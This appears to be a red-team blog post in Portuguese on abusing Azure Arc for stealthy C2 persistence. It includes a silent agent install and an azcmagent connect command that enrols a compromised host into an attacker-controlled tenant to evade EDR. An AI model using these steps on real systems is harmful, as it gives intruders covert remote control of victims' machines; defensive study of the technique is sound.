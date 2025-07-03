Este é um tópico que eu não tinha visto muito mencionado até o recente blog de Andy Gill sobre o uso do Arc como um mecanismo de C2. O Arc é excelente, pois é um produto legítimo da Microsoft e se comunica diretamente com endpoints de API conhecidos no Azure, o que significa que normalmente é negligenciado pelos produtos de detecção e resposta de endpoint (EDR). Embora eu não esteja recomendando a tentativa de operar por meio do Arc, ele serve como um mecanismo interessante fora de banda para persistência de fallback em um ambiente. Mesmo que um host tenha ingressado de forma híbrida em um ambiente Entra, não há requisito de que ele se conecte a uma instância Arc hospedada no mesmo locatário. O que isso significa é que, se você tiver um contexto de alta integridade em um host que ainda não seja gerenciado via Arc, poderá implementar seu próprio cliente Arc e gerenciá-lo por meio do seu próprio locatário do Azure.

Como o blog do Andy detalha muito o uso geral do Arc para persistência, só adicionarei um pequeno ponto sobre a operacionalização quando o acesso baseado em GUI não for possível (como o que seria típico ao operar por meio de um agente C2). Analisando os scripts de implementação, o processo de instalação do cliente Arc consiste amplamente em duas partes: a instalação do cliente real por meio de um instalador MSI e a conexão do cliente instalado a um locatário do Azure por meio de args de linha de comando passados para o Arc Connected Machine Agent (C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe). Ambos os passos neste processo podem ser concluídos localmente ou remotamente (usando sua Avenue preferida de execução de código de movimento lateral) a partir de um contexto de linha de comando não interativo, usando a sintaxe aproximada de:

1.

msiexec /i C:\path\to\AzureConnectedMachineAgent.msi /l*v C:\path\to\write\installationlog.txt /qn REBOOT=ReallySuppress

2.

"C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe" connect --service-principal-id "[Service Principal Application ID]" --service-principal-secret "[Your SP Secret]" --resource-group "[resource group]" --tenant-id "[your tenant ID]" --location "[Azure region you want client to be associated with]" --subscription-id "[your subscription]" --cloud "AzureCloud" --correlation-id "[pretty sure random GUID, can just grab from an actual script deployment]"

Depois de conectado, o sistema será exibido na lâmina Arc em seu locatário do Azure, e você poderá usar a CLI do az, a API de REST do az ou a GUI para executar ações nele. Agora que o cliente Arc está conectado a um locatário sobre o qual você tem controle total, há também uma gama mais ampla de opções disponíveis para execução subsequente de código que se estendem além do escopo do que foi abordado neste blog.

Um ponto adicional sobre a implementação do Arc: infelizmente, você não pode conectar "por cima" de outra configuração do Arc sem primeiro desconectar a conexão existente do Arc — uma operação que requer a função de Administrador de Recursos de máquina conectada do Azure. Você provavelmente poderia contornar isso desinstalando completamente e reinstalando o cliente Arc, mas essa não seria minha primeira opção de execução ou persistência. O que isso significa é que, se um sistema já tiver o Arc instalado, você deve se concentrar em obter acesso a ele por meio da conexão existente, em vez de tentar estabelecer uma conexão com seu próprio locatário nele.